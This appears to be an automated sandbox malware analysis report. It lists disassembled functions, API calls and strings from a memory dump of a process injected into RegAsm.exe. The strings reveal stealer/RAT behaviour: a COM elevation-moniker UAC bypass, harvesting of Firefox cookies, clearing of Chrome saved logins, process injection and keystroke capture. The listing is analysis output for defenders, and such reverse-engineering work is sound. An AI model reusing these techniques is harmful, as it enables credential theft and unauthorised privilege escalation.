                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4F4
                                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040F59E
                                                                                                          • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                          • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040F6A9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                                                        • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                                                                        • API String ID: 3756808967-1743721670
                                                                                                        • Opcode ID: 1d3c19fb237022e801d10a57cb3e4ad5faa3765b37f293df49325fb65a29b400
                                                                                                        • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                                                                                                        • Opcode Fuzzy Hash: 1d3c19fb237022e801d10a57cb3e4ad5faa3765b37f293df49325fb65a29b400
                                                                                                        • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0$1$2$3$4$5$6$7$VG
                                                                                                        • API String ID: 0-1861860590
                                                                                                        • Opcode ID: e6a777f80bf8230cc7af5635f6fa1f38021a03d05ab0836674c6e7259f08b149
                                                                                                        • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                                                                                        • Opcode Fuzzy Hash: e6a777f80bf8230cc7af5635f6fa1f38021a03d05ab0836674c6e7259f08b149
                                                                                                        • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                                                                                        APIs
                                                                                                        • _wcslen.LIBCMT ref: 0040755C
                                                                                                        • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Object_wcslen
                                                                                                        • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                        • API String ID: 240030777-3166923314
                                                                                                        • Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                                                        • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                                                                                        • Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                                                        • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                                                                                        APIs
                                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                                                                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                                                                                        • GetLastError.KERNEL32 ref: 0041A84C
                                                                                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                        • String ID:
                                                                                                        • API String ID: 3587775597-0
                                                                                                        • Opcode ID: 4accfa2daad176f8b5f28278118318dfa0062abe9eed3b7a7428a28b758f59c5
                                                                                                        • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                                                                                        • Opcode Fuzzy Hash: 4accfa2daad176f8b5f28278118318dfa0062abe9eed3b7a7428a28b758f59c5
                                                                                                        • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                                                                                        APIs
                                                                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                        • String ID: JD$JD$JD
                                                                                                        • API String ID: 745075371-3517165026
                                                                                                        • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                                                        • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                                                                                        • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                                                        • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                                                                                        APIs
                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Find$CloseFile$FirstNext
                                                                                                        • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                        • API String ID: 1164774033-405221262
                                                                                                        • Opcode ID: e90d06a8ec93e69e400289d3d5a4f788ee45a56a67685538a4b9ff5dd8d84a81
                                                                                                        • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                                                                                        • Opcode Fuzzy Hash: e90d06a8ec93e69e400289d3d5a4f788ee45a56a67685538a4b9ff5dd8d84a81
                                                                                                        • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                                                                                        APIs
                                                                                                        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C41F
                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C42C
                                                                                                          • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C44D
                                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                                                                        • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C473
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                        • String ID:
                                                                                                        • API String ID: 2341273852-0
                                                                                                        • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                                                        • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                                                                                        • Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                                                        • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                                                                                        APIs
                                                                                                        • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                                                                        • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                                                                          • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$Find$CreateFirstNext
                                                                                                        • String ID: 8SG$PXG$PXG$NG$PG
                                                                                                        • API String ID: 341183262-3812160132
                                                                                                        • Opcode ID: 549f0c0586074265bc254412e32d40e3dfc8ea9158c4bfb285733e3ade4af6bf
                                                                                                        • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                                                                                        • Opcode Fuzzy Hash: 549f0c0586074265bc254412e32d40e3dfc8ea9158c4bfb285733e3ade4af6bf
                                                                                                        • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 1888522110-0
                                                                                                        • Opcode ID: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                                                        • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                                                                                        • Opcode Fuzzy Hash: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                                                        • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                                                                                        APIs
                                                                                                        • RegCreateKeyExW.ADVAPI32(00000000), ref: 004140D8
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004140E4
                                                                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                        • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 004142A5
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                        • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                        • API String ID: 2127411465-314212984
                                                                                                        • Opcode ID: a82879724cc8d196e1afb1d2040caf44689d07ae5c449b658f1703a774642d90
                                                                                                        • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                                                                                        • Opcode Fuzzy Hash: a82879724cc8d196e1afb1d2040caf44689d07ae5c449b658f1703a774642d90
                                                                                                        • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 00449292
                                                                                                        • _free.LIBCMT ref: 004492B6
                                                                                                        • _free.LIBCMT ref: 0044943D
                                                                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                                                                        • _free.LIBCMT ref: 00449609
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                        • String ID:
                                                                                                        • API String ID: 314583886-0
                                                                                                        • Opcode ID: 559000fade000ce5825261073cc708c78a0cec13cca3e850b0f4d44e63821d59
                                                                                                        • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                                                                                                        • Opcode Fuzzy Hash: 559000fade000ce5825261073cc708c78a0cec13cca3e850b0f4d44e63821d59
                                                                                                        • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                                                                                                        APIs
                                                                                                          • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                                          • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                                          • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                                          • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                                          • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                                                                        • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                                                                        • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 004168A6
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                        • String ID: !D@$PowrProf.dll$SetSuspendState
                                                                                                        • API String ID: 1589313981-2876530381
                                                                                                        • Opcode ID: 4bd10a5f799b95ac4237c352870c0353e076f464d26d690b152e3588c70e8aba
                                                                                                        • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                                                                                        • Opcode Fuzzy Hash: 4bd10a5f799b95ac4237c352870c0353e076f464d26d690b152e3588c70e8aba
                                                                                                        • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                                                                                        APIs
                                                                                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                                                                        • GetLastError.KERNEL32 ref: 0040BA93
                                                                                                        Strings
                                                                                                        • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                                                                        • UserProfile, xrefs: 0040BA59
                                                                                                        • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                                                                                        • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DeleteErrorFileLast
                                                                                                        • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                        • API String ID: 2018770650-1062637481
                                                                                                        • Opcode ID: 0e12c434a704d568d93f0e9ae73d02a011f2f49309dc381e150468c0f0ecafbd
                                                                                                        • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                                                                                        • Opcode Fuzzy Hash: 0e12c434a704d568d93f0e9ae73d02a011f2f49309dc381e150468c0f0ecafbd
                                                                                                        • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                                        • GetLastError.KERNEL32 ref: 004179D8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                        • String ID: SeShutdownPrivilege
                                                                                                        • API String ID: 3534403312-3733053543
                                                                                                        • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                                                        • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                                                                                        • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                                                        • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __floor_pentium4
                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                        • API String ID: 4168288129-2761157908
                                                                                                        • Opcode ID: e29b251e1eee29052bf5b6da388e4b2e308b35626dbf2dd5d7aa75add96dd8b0
                                                                                                        • Instruction ID: 22fd31c6184e07a9d3e8c26eafc68e38345e899adb4ac4f90a3aea4af7cb717d
                                                                                                        • Opcode Fuzzy Hash: e29b251e1eee29052bf5b6da388e4b2e308b35626dbf2dd5d7aa75add96dd8b0
                                                                                                        • Instruction Fuzzy Hash: BBC27E71D046288FDB25CE28DD407EAB3B5EB8530AF1541EBD80DE7241E778AE898F45
                                                                                                        APIs
                                                                                                        • __EH_prolog.LIBCMT ref: 00409293
                                                                                                          • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                                                                                        • FindClose.KERNEL32(00000000), ref: 004093FC
                                                                                                          • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                                          • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                                          • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
                                                                                                        • FindClose.KERNEL32(00000000), ref: 004095F4
                                                                                                          • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                                          • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                                                        • String ID:
                                                                                                        • API String ID: 1824512719-0
                                                                                                        • Opcode ID: 403e8f00e880f72b82558a69448ef6646ea8491fdd4c1094c816304795b95f0e
                                                                                                        • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                                                                                                        • Opcode Fuzzy Hash: 403e8f00e880f72b82558a69448ef6646ea8491fdd4c1094c816304795b95f0e
                                                                                                        • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                                                                                        APIs
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                                                                                        • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                        • String ID:
                                                                                                        • API String ID: 276877138-0
                                                                                                        • Opcode ID: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                                                        • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                                                                                        • Opcode Fuzzy Hash: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                                                        • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                                                                                        APIs
                                                                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                                                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                                                                                        • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale
                                                                                                        • String ID: ACP$OCP
                                                                                                        • API String ID: 2299586839-711371036
                                                                                                        • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                                        • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                                                                                        • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                                        • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                                                                                        APIs
                                                                                                        • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000,?,0040F419,00000000), ref: 0041B54A
                                                                                                        • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                                                                                        • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                                                                                        • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                                                        • String ID: SETTINGS
                                                                                                        • API String ID: 3473537107-594951305
                                                                                                        • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                                                                        • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                                                                                        • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
